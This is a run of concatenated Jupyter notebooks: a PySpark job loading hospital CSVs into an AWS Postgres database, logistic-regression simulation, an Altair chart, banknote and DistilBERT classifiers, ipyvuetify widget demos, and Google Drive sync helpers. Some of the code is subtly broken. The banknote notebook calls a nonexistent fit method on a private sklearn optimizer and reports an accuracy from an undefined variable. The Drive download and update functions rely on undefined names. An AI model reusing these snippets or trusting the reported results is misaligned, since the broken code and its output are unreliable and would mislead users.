!wget -q http://www-us.apache.org/dist/spark/$SPARK_VERSION/$SPARK_VERSION-bin-hadoop2.7.tgz
!tar xf $SPARK_VERSION-bin-hadoop2.7.tgz
!pip install -q findspark
# Set Environment Variables
os.environ["JAVA_HOME"] = "/usr/lib/jvm/java-11-openjdk-amd64"
os.environ["SPARK_HOME"] = f"/content/{spark_version}-bin-hadoop2.7"
# Start a SparkSession
import findspark
findspark.init()
!wget https://jdbc.postgresql.org/download/postgresql-42.2.9.jar
from pyspark.sql import SparkSession
spark = SparkSession.builder.appName("CloudETL").config("spark.driver.extraClassPath","/content/postgresql-42.2.9.jar").getOrCreate()
# Read in data from S3 Buckets
from pyspark import SparkFiles
url="https://yellowteambucket.s3.us-east-2.amazonaws.com/hosp_addr.csv"
spark.sparkContext.addFile(url)
hosp_addr_df = spark.read.csv(SparkFiles.get("hosp_addr.csv"), sep=",", header=True, inferSchema=True)
# Show DataFrame
hosp_addr_df.show()
url="https://yellowteambucket.s3.us-east-2.amazonaws.com/hosp_closures.csv"
spark.sparkContext.addFile(url)
hosp_closures_df = spark.read.csv(SparkFiles.get("hosp_closures.csv"), sep=",", header=True, inferSchema=True)
# Show DataFrame
hosp_closures_df.show()
url="https://yellowteambucket.s3.us-east-2.amazonaws.com/hosp_metric.csv"
spark.sparkContext.addFile(url)
hosp_metric_df = spark.read.csv(SparkFiles.get("hosp_metric.csv"), sep=",", header=True, inferSchema=True)
# Show DataFrame
hosp_metric_df.show()
hosp_metric_df.dtypes
url="https://yellowteambucket.s3.us-east-2.amazonaws.com/hospital_popup.csv"
spark.sparkContext.addFile(url)
hospital_popup_df = spark.read.csv(SparkFiles.get("hospital_popup.csv"), sep=",", header=True, inferSchema=True)
# Show DataFrame
hospital_popup_df.show()
# Loading the svi data
url="https://yellowteambucket.s3.us-east-2.amazonaws.com/svi_data.csv"
spark.sparkContext.addFile(url)
svi_data_df = spark.read.csv(SparkFiles.get("svi_data.csv"), sep=",", header=True, inferSchema=True)
# Show DataFrame
svi_data_df.show()
url="https://yellowteambucket.s3.us-east-2.amazonaws.com/us_hospital_locations.csv"
spark.sparkContext.addFile(url)
raw_hospital_data = spark.read.csv(SparkFiles.get("us_hospital_locations.csv"), sep=",", header=True, inferSchema=True)
# Show DataFrame
raw_hospital_data.show()
# Configure settings for RDS
mode = "append"
jdbc_url="jdbc:postgresql://capstone.cjj05msruqqh.us-east-2.rds.amazonaws.com:5432/capstone_db"
config = {"user":"postgres",
"password": "",
"driver":"org.postgresql.Driver"}
# Write DataFrame to hosp_addr_df table in RDS
hosp_addr_df.write.jdbc(url=jdbc_url, table='hosp_addr', mode=mode, properties=config)
# Write dataframe to hospital closures table in RDS
hosp_closures_df.write.jdbc(url=jdbc_url, table='hosp_closures', mode=mode, properties=config)
# Write dataframe to state metrics table in RDS
hosp_metric_df.write.jdbc(url=jdbc_url, table='state_metrics', mode=mode, properties=config)
# Write dataframe to svi_data table in RDS
svi_data_df.write.jdbc(url=jdbc_url, table='svi_data', mode=mode, properties=config)
# Write dataframe to hospital popup table in RDS
hospital_popup_df.write.jdbc(url=jdbc_url, table='hosp_popup', mode=mode, properties=config)
# Write dataframe to raw hospital data in RDS
raw_hospital_data.write.jdbc(url=jdbc_url, table='raw_hospital_data', mode=mode, properties=config)
###Output
_____no_output_____ |
create simulation data for binary classification.ipynb | ###Markdown
Creating Simulation Data for Binary ClassificationNote: When you want to test your model, or provide some sample practice to your students,this can be very useful This content includes How binary classification (Logistic regression) works How generate simulation data Test simulation data with sklearn logistic regerssion 1. How binary classification (Logistic regression) works Brief work flowsinput (x1, x2, ...) ==> Logit function (z) ==> Sigmoid function (P) ==> Casting (y) ==> Output (1 or 0) Logit has a output(z) of linear probability. Easy example of logit is same as multivariabe linear regression model Example) $z = \beta _0 + \beta_1\cdot x_1 + ... + \beta_n \cdot x_n$ This output theoratically has a range of (-inf, inf) In this example, I used only one input variable (x1).I generated beta0 (intercept) and beta1 (coefficient of x1) with random number between 0 and 1
###Code
import numpy as np
import matplotlib.pyplot as plt
np.random.seed(0)
x1 = np.random.randn(1000) * 7
beta0 = np.random.randn(1)
beta1 = np.random.randn(1)
print('beta0: {},\nbeta1: {}'.format(beta0, beta1))
z = beta0 + x1*beta1
plt.scatter(x1, z, s=1)
plt.xlabel('x1')
plt.ylabel('z')
plt.grid()
plt.show()
###Output
beta0: [0.55596268],
beta1: [0.89247389]
###Markdown
Sigmoid transforms output of logit into (0, 1)Sigmoid:$P(y=1) = \frac{1}{1+e^{-z}}$P is the probability of being positive(1) in binary classification
###Code
p = 1 / (1 + np.exp(-z))
plt.scatter(x1, p, s=1)
plt.axhline(0.5, color='black', linestyle='--', alpha=.3)
plt.axhline(0, color='black', linestyle='--', alpha=.3)
plt.axhline(1, color='black', linestyle='--', alpha=.3)
plt.axvline(-beta0/beta1, color='black', linestyle='--', alpha=0.3)
plt.xlabel('x1')
plt.ylabel('P')
plt.show()
###Output
_____no_output_____
###Markdown
If P is equal or bigger than 0.5 (if p >= 0.5)y prediction will be 1Or P is less than 0.5 (if p y prediction will be 0In this example, 51.2% is predicted as 1
###Code
y_prediction = np.zeros(1000)
y_prediction[p>=0.5] = 1
y_prediction = np.array(y_prediction, dtype=int)
y_prediction.sum()/len(y_prediction)
pie = np.bincount(y_prediction)
plt.pie(pie, labels=np.arange(2), autopct='%1.1f%%')
plt.show()
###Output
_____no_output_____
###Markdown
2. How to generate simulation dataThere are two most common method to generate y value for simulation. Create simulated y same method as how we predict the y. (Wrong way) If $p >= 0.5$, put 1, else, put 0 Generate uniformed random number (r) between 0 and 1, and compare to p. (Right way) If $r <= p$, put 1, else, put 0
###Code
from sklearn.linear_model import LogisticRegression
x1 = x1.reshape(-1,1)
y_wrong_way = np.zeros(1000)
y_wrong_way[p>=0.5] = 1
model = LogisticRegression()
model.fit(x1, y_wrong_way)
y_hat = model.predict(x1)
model.intercept_, model.coef_
beta0, beta1
from sklearn.metrics import accuracy_score, classification_report, confusion_matrix
accuracy_score(y_hat, y_wrong_way)
confusion_matrix(y_hat, y_wrong_way)
###Output
_____no_output_____
###Markdown
With the y simulated in wrong way (first method),accuracy of the logistic regression model is 99.9%.However, model predicted wrong intercept and coefficient.Predicted intercept & coefficient : (2.40545658, 4.20435562) Generated intercept & coefficient : (0.55596268, 0.89247389)This means the model is overfitted. In the second method,P is probability of being 1It is same as probability of "Uniformly distributed random number [0,1) is placed between 0 ~ P"
###Code
r = np.random.rand(1000)
y_right_way = np.zeros(1000)
y_right_way[r<=p] = 1
y_right_way.sum()/len(y_right_way)
model2 = LogisticRegression()
model2.fit(x1, y_right_way)
y_hat2 = model2.predict(x1)
model2.intercept_, model2.coef_
accuracy_score(y_hat2, y_right_way)
###Output
_____no_output_____ |
viz-1b-flights-splom.ipynb | ###Markdown
viz-1b-flights-splom.ipynbThis notebook builds on the learnings from [the first one](ttps://walterra.github.io/jupyter2kibana/viz-1a-flights-histogram.html) and uses the same data to create and deploy a scatterplot matrix. The difference here is that we moved the code to create the SavedObject in Kibana to a helper function into [kibana_vega_util.py](https://github.com/walterra/jupyter2kibana/blob/master/kibana_vega_util.py) so we can reuse it.
###Code
import datetime
import altair as alt
import eland as ed
import json
import numpy as np
import matplotlib.pyplot as plt
alt.data_transformers.disable_max_rows()
url = 'http://localhost:9200/kibana_sample_data_flights/_search?size=1000'
url_data = alt.Data(url=url, format=alt.DataFormat(property='hits.hits',type='json'))
fields = [
'Carrier',
'AvgTicketPrice',
'DistanceKilometers',
'DistanceMiles',
'FlightDelayMin',
'FlightTimeMin',
'dayOfWeek'
]
rename_dict = dict((a, 'datum._source.'+a) for a in fields)
chart = alt.Chart(url_data).mark_circle(
opacity=.5,
size=6
).transform_calculate(**rename_dict).encode(
alt.X(alt.repeat("column"), type='quantitative'),
alt.Y(alt.repeat("row"), type='quantitative')
).properties(
width=100,
height=100
).repeat(
row=['AvgTicketPrice', 'DistanceKilometers', 'FlightDelayMin', 'FlightTimeMin'],
column=['FlightTimeMin', 'FlightDelayMin', 'DistanceKilometers', 'AvgTicketPrice']
).interactive()
chart
from save_vega_vis import saveVegaVis
from elasticsearch import Elasticsearch
es=Elasticsearch([{'host':'localhost','port':9200}])
saveVegaVis(es, 'kibana_sample_data_flights', 'def-vega-splom-1', chart, resultSize=1000)
###Output
_____no_output_____ |
Banknote Authentication.ipynb | ###Markdown
Banknote aunthentication
###Code
# importing python data analysis toolkit
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
# reading random points from xlsx file and storing results in data frame
data = pd.read_csv("data_banknote_authentication.csv")
data.head(5)
###Output
_____no_output_____
###Markdown
Analyzing the data
###Code
data.info() # missing values not found
#number of instances (rows) that belong to each class. We can view this as an absolute count.
data['class'].value_counts()
###Output
_____no_output_____
###Markdown
Visualizing the Class Column
###Code
sns.heatmap(data.corr(), square=True, annot=True)
columns = [f for f in data.columns if data.dtypes[f] != 'object']
values = pd.melt(data, value_vars = columns)
hist = sns.FacetGrid (values, col='variable', col_wrap=4, sharex=False, sharey = False)
hist = hist.map(sns.distplot, 'value')
hist
###Output
_____no_output_____
###Markdown
Splitting data into training and testing
###Code
X5 = data.drop('class', axis=1)
X5.head()
y5 = data['class']
y5.head()
from sklearn.model_selection import train_test_split
X5_train, X5_test, y5_train, y5_test = train_test_split(X5, y5, test_size = 0.20)
print("Sample in traiing set:::", X5_train.shape)
print("Sample in testing set:::", X5_test.shape)
print("Sample of target in training set::", y5_train.shape)
print("Sample of target in testing set::", y5_test.shape)
from sklearn.neural_network._stochastic_optimizers import SGDOptimizer
gd = SGDOptimizer(params='0.1', learning_rate_init=0.1)
gd.fit(X5_train, y5_train)
from sklearn.metrics import classification_report, confusion_matrix
print(confusion_matrix(y5_test,pred5.round()))
print(classification_report(y5_test,pred5.round()))
from sklearn.metrics import accuracy_score
accuracy5 = accuracy_score(y5_test, pred5.round())
print("Accuracy", accuracy5)
###Output
Accuracy 0.9890909090909091
|
civility/classifier/other_implementations/pytorch_custom.ipynb | ###Markdown
Dataset
###Code
from datasets import load_dataset
import random
import torch
from torch import nn
from torch.utils.data import DataLoader
from tqdm.auto import tqdm
from transformers import AdamW, DistilBertTokenizerFast, DistilBertForSequenceClassification, get_scheduler
tokenizer = DistilBertTokenizerFast.from_pretrained('distilbert-base-uncased')
dataset = load_dataset("civil_comments")
class CivilCommentsDataset(torch.utils.data.Dataset):
"""
Builds split instance of the `civil_comments` dataset: https://huggingface.co/datasets/civil_comments.
"""
def __init__(self, encodings, labels):
self.encodings = encodings
self.labels = labels
def __getitem__(self, idx):
item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}
item['labels'] = torch.tensor(self.labels[idx])
return item
def __len__(self):
return len(self.labels)
def build_data_split(split, num_data_points):
print(f"Generating {num_data_points} data points for {split} split...", end="", flush=True)
civil_idx = []
uncivil_idx = []
num_civil = num_data_points / 2
num_uncivil = num_data_points / 2
for i, data in enumerate(dataset[split]):
if data["toxicity"] < 0.5 and num_civil > 0:
civil_idx.append(i)
num_civil -= 1
elif data["toxicity"] > 0.5 and num_uncivil > 0:
uncivil_idx.append(i)
num_uncivil -= 1
if num_civil == 0 and num_uncivil == 0:
break
indexes = civil_idx + uncivil_idx
random.shuffle(indexes)
encodings = tokenizer(dataset[split][indexes]["text"], truncation=True, padding=True)
labels = dataset[split][indexes]["toxicity"]
print("done")
return encodings, labels
encodings, labels = build_data_split("train", 500)
train_dataset = CivilCommentsDataset(encodings, labels)
encodings, labels = build_data_split("validation", 500)
val_dataset = CivilCommentsDataset(encodings, labels)
###Output
_____no_output_____
###Markdown
Model
###Code
model = DistilBertForSequenceClassification.from_pretrained(
'distilbert-base-uncased',
num_labels=1,
)
model.dropout.p = 0
model.add_module(module=nn.Sigmoid(), name="sigmoid")
for param in model.base_model.parameters():
param.requires_grad = False
train_data_loader = DataLoader(train_dataset, shuffle=True, batch_size=128)
eval_data_loader = DataLoader(val_dataset, batch_size=128)
optimizer = AdamW(model.parameters(), lr=1e-3)
num_epochs = 20
num_training_steps = num_epochs * len(train_data_loader)
lr_scheduler = get_scheduler(
"linear",
optimizer=optimizer,
num_warmup_steps=0,
num_training_steps=num_training_steps
)
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
model.to(device)
progress_bar = tqdm(range(num_training_steps))
def eval_mod():
mse_mean = []
acc_mean = []
for batch in eval_data_loader:
batch = {k: v.to(device) for k, v in batch.items()}
with torch.no_grad():
outputs = model(**batch)
labels = batch["labels"]
outputs = outputs.logits
mse_mean.append(torch.mean(torch.square(outputs - labels)))
acc_mean.append(
torch.mean(torch.eq(outputs.transpose(0, 1) > 0.5, labels > 0.5).float())
)
return torch.mean(torch.stack(mse_mean)), torch.mean(torch.stack(acc_mean))
###Output
_____no_output_____
###Markdown
Main Program
###Code
for epoch in range(num_epochs):
losses = []
for batch in train_data_loader:
batch = {k: v.to(device) for k, v in batch.items()}
outputs = model(**batch)
loss = outputs.loss
losses.append(float(loss.data))
loss.backward()
optimizer.step()
lr_scheduler.step()
optimizer.zero_grad()
progress_bar.update(1)
mse_mean, accuracy_mean = eval_mod()
loss_mean = torch.mean(torch.tensor(losses))
print(f" After epoch {epoch} | Train Loss: {loss_mean:.2f}, Val MSE: {mse_mean:.2f}, Val Accuracy: {accuracy_mean:.2f}")
model.save_pretrained(f"./results/checkpoints/epoch-{epoch}")
model.save_pretrained("./results/final_model")
print("\nProgram complete")
###Output
_____no_output_____ |
2019-09-4-EuroSciPy-voila/why-ipyvuetify.ipynb | ###Markdown
Maarten Breddels Motivation Glue Jupyter * Glue in the notebook * Comes from Qt -> GUI Challenges for ipywidgets
###Code
import glue_jupyter as gj
import ipywidgets
import ipywidgets as widgets
data = gj.example_data_xyz()
app = gj.jglue(data=data)
app.histogram1d();
###Output
_____no_output_____
###Markdown
Oliver Borderies - SocGen * Olivier: I want to put widget into a modern component pages (Vue) * Me: I want more of these React based MaterialUI widgets * Olivier: but Vue is better * Me: But React is more popular * Me & Olivier: lets autogen MaterialUI & Vuetify widgets * Mario: I can make it! * QuantStack project Plan * Wrap both * MaterialUI (React based) * Vuetify (Vue based) * Both are Material Design component libraries * All code is autogenerated * ipyvuetify * xvuetify? * jlvuetify? * jvuetify * Enable modern Single Page Applications (SPA) with widget support. * With kernel (voila) * Without kernel, plain html (nbconvert?) * (for free it renders on mobile) ipymaterialui * `$ pip install ipymaterialui` * Wraps MaterialUI * React based * Material Design * ~15 widgets manually wrapped * Mario is working on wrapping it all * (future: ipyreact + cookiecutter/manual how to wrap new/existing React components)
###Code
import ipymaterialui as mui
text1 = "Jupyter"
text2 = "Jupyter Widgets"
text3 = "Material UI"
text4 = "React"
texts = [text1, text2, text3, text4]
# the baseclass is just a
chips = [mui.Chip(label=text) for text in texts]
chips_div = mui.Div(children=chips)
chips_div
# Nice looking lists, the 3rd acting like a button
list_items = [
mui.ListItem(children=[mui.ListItemText(primary=text1, secondary=text3)], divider=True),
mui.ListItem(children=[mui.ListItemText(primary=text2, secondary=text4)], divider=True),
mui.ListItem(children=[mui.ListItemText(primary=text3, secondary=text1)], divider=True, button=True),
mui.ListItem(children=[mui.ListItemText(primary=text4, secondary=text2)], divider=True)
]
mui.List(children=list_items)
# For the moment only list items can be used for popup menus
# This needs a more generic solution?
menuitems = [
mui.MenuItem(description=text1, value='1'),
mui.MenuItem(description=text2, value='2'),
mui.MenuItem(description=text3, value='3')
]
menu = mui.Menu(children=menuitems)
list_item_text = mui.ListItemText(primary=text4, secondary=text1, button=True)
list_item = mui.ListItem(children=[list_item_text], button=True, menu=menu)
list_item
###Output
_____no_output_____
###Markdown
Sure nice, but Olivier wants Vue(tify) Ipyvuetify * `$ pip install ipyvuetify` * QuantStack/SocGen project (Olivier Borderier) * Made by Mario Buikhuizen * Wraps Vuetify * Vue based * Material Design
###Code
import ipyvuetify as v
import ipywidgets as widgets
from threading import Timer
lorum_ipsum = 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.'
v.Layout(children=[
v.Btn(color='primary', children=['primary']),
v.Btn(color='error', children=['error']),
v.Btn(color='pink lighten-4', children=['custom']),
v.Btn(color='#654321', dark=True, children=['hex']),
v.Btn(color='#654321', disabled=True, children=['disabled']),
])
v.Layout(children=[
v.Btn(color='primary', flat=True, children=['flat']),
v.Btn(color='primary', flat=True, disabled=True, children=['flat']),
v.Btn(color='primary', round=True, children=['round']),
v.Btn(color='primary', round=True, disabled=True, children=['round']),
v.Btn(color='primary', depressed=True, children=['depressed']),
v.Btn(color='primary', flat=True, icon=True, children=[v.Icon(children=['thumb_up'])]),
v.Btn(color='primary', outline=True, children=['outline']),
])
v.Layout(children=[
v.Btn(color='primary', small=True, children=['small']),
v.Btn(color='primary', children=['normal']),
v.Btn(color='primary', large=True, children=['large']),
v.Btn(color='primary', small=True, fab=True, children=[v.Icon(children=['edit'])]),
v.Btn(color='primary', fab=True, children=[v.Icon(children=['edit'])]),
v.Btn(color='primary', fab=True, large=True, children=[v.Icon(children=['edit'])]),
])
def toggleLoading():
button2.loading = not button2.loading
button2.disabled = button2.loading
def on_loader_click(*args):
toggleLoading()
Timer(2.0, toggleLoading).start()
button2 = v.Btn(loading=False, children=['loader'])
button2.on_event('click', on_loader_click)
v.Layout(children=[button2])
toggle_single = v.BtnToggle(v_model=2, class_='mr-3', children=[
v.Btn(flat=True, children=[v.Icon(children=['format_align_left'])]),
v.Btn(flat=True, children=[v.Icon(children=['format_align_center'])]),
v.Btn(flat=True, children=[v.Icon(children=['format_align_right'])]),
v.Btn(flat=True, children=[v.Icon(children=['format_align_justify'])]),
])
toggle_multi = v.BtnToggle(v_model=[0,2], multiple=True, children=[
v.Btn(flat=True, children=[v.Icon(children=['format_bold'])]),
v.Btn(flat=True, children=[v.Icon(children=['format_italic'])]),
v.Btn(flat=True, children=[v.Icon(children=['format_underline'])]),
v.Btn(flat=True, children=[v.Icon(children=['format_color_fill'])]),
])
v.Layout(pa_1=True, children=[
toggle_single,
toggle_multi,
])
v.Layout(children=[
v.Btn(color='primary', children=[
v.Icon(left=True, children=['fingerprint']),
'Icon left'
]),
v.Btn(color='primary', children=[
'Icon right',
v.Icon(right=True, children=['fingerprint']),
]),
v.Tooltip(bottom=True, children=[
v.Btn(slot='activator', color='primary', children=[
'tooltip'
]),
'Insert tooltip text here'
])
])
def on_menu_click(widget, event, data):
if len(layout.children) == 1:
layout.children = layout.children + [info]
info.children=[f'Item {items.index(widget)+1} clicked']
items = [v.ListTile(children=[
v.ListTileTitle(children=[
f'Click me {i}'])])
for i in range(1, 5)]
for item in items:
item.on_event('click', on_menu_click)
menu = v.Menu(offset_y=True, children=[
v.Btn(slot='activator', color='primary', children=[
'menu',
v.Icon(right=True, children=[
'arrow_drop_down'
])
]),
v.List(children=items)
])
info = v.Chip()
layout = v.Layout(children=[
menu
])
layout
v.Dialog(v_model=False, width='500', children=[
v.Btn(slot="activator", color='success', dark=True, children=[
"Open dialog"
]),
v.Card(children=[
v.CardTitle(class_='headline gray lighten-2', primary_title=True, children=[
"Lorem ipsum"]),
v.CardText(children=[
lorum_ipsum])
])
])
slider = v.Slider(v_model=25)
slider2 = v.Slider(thumb_label=True, v_model=25)
slider3 = v.Slider(thumb_label='always', v_model=25)
widgets.jslink((slider, 'v_model'), (slider2, 'v_model'))
widgets.jslink((slider, 'v_model'), (slider3, 'v_model'))
v.Container(children=[
slider,
slider2,
slider3
])
select1=v.Select(label="Choose option", items=['Option a', 'Option b', 'Option c'])
v.Layout(children=[select1])
tab_list = [v.Tab(children=[f'Tab {i}']) for i in range(1,4)]
content_list = [v.TabItem(children=[lorum_ipsum]) for i in range(1,4)]
tabs = v.Tabs(
v_model=1,
children=tab_list + content_list)
tabs
vepc1 = v.ExpansionPanelContent(children=[
v.Html(tag='div', slot='header', children=['item1']),
v.Card(children=[
v.CardText(children=['First Text'])])])
vepc2 = v.ExpansionPanelContent(children=[
v.Html(tag='div', slot='header', children=['item2']),
v.Card(children=[
v.CardText(children=['Second Text'])])])
vep = v.ExpansionPanel(children=[vepc1, vepc2])
vl = v.Layout(children=[vep])
vl
import ipyvuetify as v
from traitlets import (Unicode, List, Bool, Any)
class MyApp(v.VuetifyTemplate):
dark = Bool(True).tag(sync=True)
drawers = Any(['Default (no property)', 'Permanent', 'Temporary']).tag(sync=True)
model = Any(None).tag(sync=True)
type = Unicode('default (no property)').tag(sync=True)
clipped = Bool(False).tag(sync=True)
floating = Bool(True).tag(sync=True)
mini = Bool(False).tag(sync=True)
inset = Bool(False).tag(sync=True)
template = Unicode('''
<template>
<v-app id="sandbox" :dark="dark">
<v-navigation-drawer
v-model="model"
:permanent="type === 'permanent'"
:temporary="type === 'temporary'"
:clipped="clipped"
:floating="floating"
:mini-variant="mini"
absolute
overflow
app
>
</v-navigation-drawer>
<v-toolbar :clipped-left="clipped" app absolute>
<v-toolbar-side-icon
v-if="type !== 'permanent'"
@click.stop="model = !model"
></v-toolbar-side-icon>
<v-toolbar-title>Vuetify</v-toolbar-title>
</v-toolbar>
<v-content>
<v-container fluid>
<v-layout align-center justify-center>
<v-flex xs10>
<v-card>
<v-card-text>
<v-layout row wrap>
<v-flex xs12 md6>
<span>Scheme</span>
<v-switch v-model="dark" primary label="Dark"></v-switch>
</v-flex>
<v-flex xs12 md6>
<span>Drawer</span>
<v-radio-group v-model="type" column>
<v-radio
v-for="drawer in drawers"
:key="drawer"
:label="drawer"
:value="drawer.toLowerCase()"
primary
></v-radio>
</v-radio-group>
<v-switch v-model="clipped" label="Clipped" primary></v-switch>
<v-switch v-model="floating" label="Floating" primary></v-switch>
<v-switch v-model="mini" label="Mini" primary></v-switch>
</v-flex>
<v-flex xs12 md6>
<span>Footer</span>
<v-switch v-model="inset" label="Inset" primary></v-switch>
</v-flex>
</v-layout>
</v-card-text>
<v-card-actions>
<v-spacer></v-spacer>
<v-btn flat>Cancel</v-btn>
<v-btn flat color="primary">Submit</v-btn>
</v-card-actions>
</v-card>
</v-flex>
</v-layout>
</v-container>
</v-content>
<v-footer :inset="inset" app>
<span class="px-3">© {{ new Date().getFullYear() }}</span>
</v-footer>
</v-app>
</template>''').tag(sync=True)
def vue_menu_click(self, data):
self.color = self.items[data]
self.button_text = self.items[data]
app = MyApp()
app
app.inset = True
app.dark = True
app.type = 'permanent'
###Output
_____no_output_____
###Markdown
core ipywidgets vs ipyvuetify * Composible vs verbosity
###Code
options = ['pepperoni', 'pineapple', 'anchovies']
v.RadioGroup(children=[v.Radio(label=k, value=k) for k in options], v_model=options[0])
widgets.RadioButtons(options=options, value=options[0], description='Pizza topping:')
v.Btn(color='primary', children=[
v.Icon(left=True, children=['fingerprint']),
'Icon left'
])
widgets.Button(color='primary', description='icon left', icon='home')
menu = v.Menu(offset_y=True, children=[
v.Btn(slot='activator', color='primary', children=[
'menu',
v.Icon(right=True, chi ldren=[
'arrow_drop_down'
])
]),
v.List(children=items)
])
menu
###Output
_____no_output_____ |
util_nbs/00b_data_manage.DLMusic_Data.ipynb | ###Markdown
Repo ManagementWhile I don't want to track large data files with git (also some I'd like to keep private), I still want to make use of the cloud to store my files in the case that something happens to my local machine. Thus, here I outline the ability to shuttle files between my google drive and this repo (first build solution, we'll see if it lasts). Accessing Google driveUsing pydrive https://pythonhosted.org/PyDrive/quickstart.html, I came up with the following code. General utils and conventionsNeed to go to googles API Console (see link above) and download the `client_secrets.json` and put it in this directory (perhaps also in the ml module directory). I think this only needs to be done once Prepping connection
###Code
#export
gauth = GoogleAuth()
drive = GoogleDrive(gauth)
gauth.LocalWebserverAuth() # Creates local webserver and auto handles authentication.
###Output
Your browser has been opened to visit:
https://accounts.google.com/o/oauth2/auth?client_id=884310440114-oqhbrdkc3vikjmr3nvnrkb0ptr7lvp8r.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8080%2F&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fdrive&access_type=offline&response_type=code
Authentication successful.
###Markdown
Encoding google file typesThese are super long and not always intuitive so I'll store them in a dict that will make them more readable
###Code
# export
gtypes = {
'folder' : 'application/vnd.google-apps.folder'
}
gtypes['folder']
###Output
_____no_output_____
###Markdown
Grabbing root id
###Code
# export
def get_root_remote_id(folderName = 'ml_repo_data', gtypes=gtypes):
# query google drive
folders = drive.ListFile(
{'q': f"title='{folderName}' and mimeType='{gtypes['folder']}' and trashed=false"}).GetList()
folder = folders[0] # the above returns a list
return folder['id']
root_id = get_root_remote_id()
root_id[:5] # not going to print all 33 chars
###Output
_____no_output_____
###Markdown
Grabbing folder idArgument is for the id of that above it in the tree (the `parent` id)
###Code
# export
def get_folder_id(parent_id, foldername):
# grab the folder
ftype = gtypes['folder'] # unfortunately if I don't do this Jupyter freaks out with indentations/coloration
folders = drive.ListFile(
{'q': f"title='{foldername}' and mimeType='{ftype}' and '{parent_id}' in parents and trashed=false"}).GetList()
folder = folders[0] # the above returns a list
return folder['id']
DLM_id = get_folder_id(parent_id = root_id, foldername = 'DL_music')
DLM_id[:5] # not going to print all 33 chars
###Output
_____no_output_____
###Markdown
Grabbing folder contents
###Code
# export
def grab_folder_contents(parent_id):
'''Return a list of all the items in a folder based on its parent id'''
file_list = drive.ListFile({'q': f"'{parent_id}' in parents and trashed=false"}).GetList()
return file_list
file_list = grab_folder_contents(DLM_id)
# it returns a list
file = file_list[1]
# each file is a dictionary of information
file.keys()
###Output
_____no_output_____
###Markdown
check if file exists remote by name and parent
###Code
# export
def check_file_exists_remote(parent_id, fname):
file_list = grab_folder_contents(parent_id)
for file in file_list:
if file['title'] == fname : return True
continue
return False
parent_id = file['parents'][0]['id']
fname = file['title']
check_file_exists_remote(parent_id, fname)
###Output
_____no_output_____
###Markdown
Grabbing file id
###Code
# export
def get_file_id(parent_id, fname):
# grab the folder
ftype = gtypes['folder'] # unfortunately if I don't do this Jupyter freaks out with indentations/coloration
file_list = drive.ListFile(
{'q': f"title='{fname}' and '{parent_id}' in parents and trashed=false"}).GetList()
file = file_list[0] # the above returns a list
return file['id']
file_id = get_file_id(parent_id, fname)
file_id[:5]
###Output
_____no_output_____
###Markdown
downloading filesEverything draws from the pydrives "file" object which can be initiated with the file's remote id. Downloading it from there is simple
###Code
# export
def download_file(file_id, local_dpath = None):
# Create GoogleDriveFile instance with file id of file1.
file = drive.CreateFile({'id': item['id']})
local_dpath = './' if local_dpath is None else local_repo_path + local_dpath
local_fpath = local_dpath + file['title']
file.GetContentFile(local_fpath)
return local_fpath
local_dpath = 'data/DeepLearn_Music/'
file_id = item['id']
local_fpath = download_file(file_id, local_dpath)
local_fpath
###Output
_____no_output_____
###Markdown
uploading new file
###Code
# export
def upload_new_file(local_fpath, fname, parent_id):
file = drive.CreateFile({'parents': [{'id': f'{parent_id}'}]})
file['title'] = fname
file.SetContentFile(local_fpath)
file.Upload()
return
upload_new_file(local_fpath, item['title'], item['parents'][0]['id'])
###Output
GoogleDriveFile({'parents': [{'id': '1QbKZKPxfPPnLzxL6NcLmZO0mOmzm_wCL'}]})
###Markdown
updating existing file
###Code
# export
def update_existing_file(local_fpath, file_id):
file = drive.CreateFile({'id': item['id']})
file.SetContentFile(local_fpath)
file.Upload()
return
update_existing_file(local_fpath, item['id'])
###Output
_____no_output_____
###Markdown
Sync a file to remoteRegardless of it exists or not (it will check)
###Code
# export
def sync_file_to_remote(local_fpath, fname, parent_id):
'''will check if file exists remote first then will upload/update
accordingly'''
file_exists_remote = check_file_exists_remote(parent_id, fname)
# update if its already there
if file_exists_remote:
file_id = get_file_id(parent_id, fname)
update_existing_file(local_fpath, file_id)
# upload a new one else
else:
upload_new_file(local_fpath, fname, parent_id)
return
sync_file_to_remote(local_fpath, item['title'], item['parents'][0]['id'])
###Output
_____no_output_____
###Markdown
DeepLearn_music UtilsUsing some of the utils above but defining the tree structure here
###Code
class DeepLearnMusic_Syncer():
def __init__(self):
self.DLM_folderName = 'DL_music'
self.DLM_id = self.get_DLM_remote_id()
return
def get_DLM_remote_id(self):
# get the root_id in the drive
root_id = get_root_remote_id()
# grab the folder
ftype = gtypes['folder'] # unfortunately if I don't do this Jupyter freaks out with indentations
folders = drive.ListFile(
{'q': f"title='{self.DLM_folderName}' and mimeType='{ftype}' and '{root_id}' in parents and trashed=false"}).GetList()
folder = folders[0] # the above returns a list
return folder['id']
a = DeepLearnMusic_Syncer()
a.DLM_id
file_list = drive.ListFile({'q': "'1zAxvLd2KQiOcZXma3nMaeUehQ_JiSJFy' in parents and trashed=false"}).GetList()
for file in file_list:
print('Title: %s, ID: %s' % (file['title'], file['id']))
# Get the folder ID that you want
if(file['title'] == "To Share"):
fileID = file['id']
def grab_file_ids(parent_id):
file_list = drive.ListFile({'q': f"'{parent_id}' in parents and trashed=false"}).GetList()
ids = {}
for file in file_list:
ids[file['title']] = file['id']
return ids
grab_file_ids(a.DLM_id)
###Output
_____no_output_____
###Markdown
Tutorial
###Code
# this will prompt you to log in to google
import ml.repo_management.drive as drive
drive.get_root_remote_id()
fileList = drive.ListFile({'q': "'DS_resources' in parents and trashed=false"}).GetList()
for file in fileList:
print('Title: %s, ID: %s' % (file['title'], file['id']))
# Get the folder ID that you want
if(file['title'] == "To Share"):
fileID = file['id']
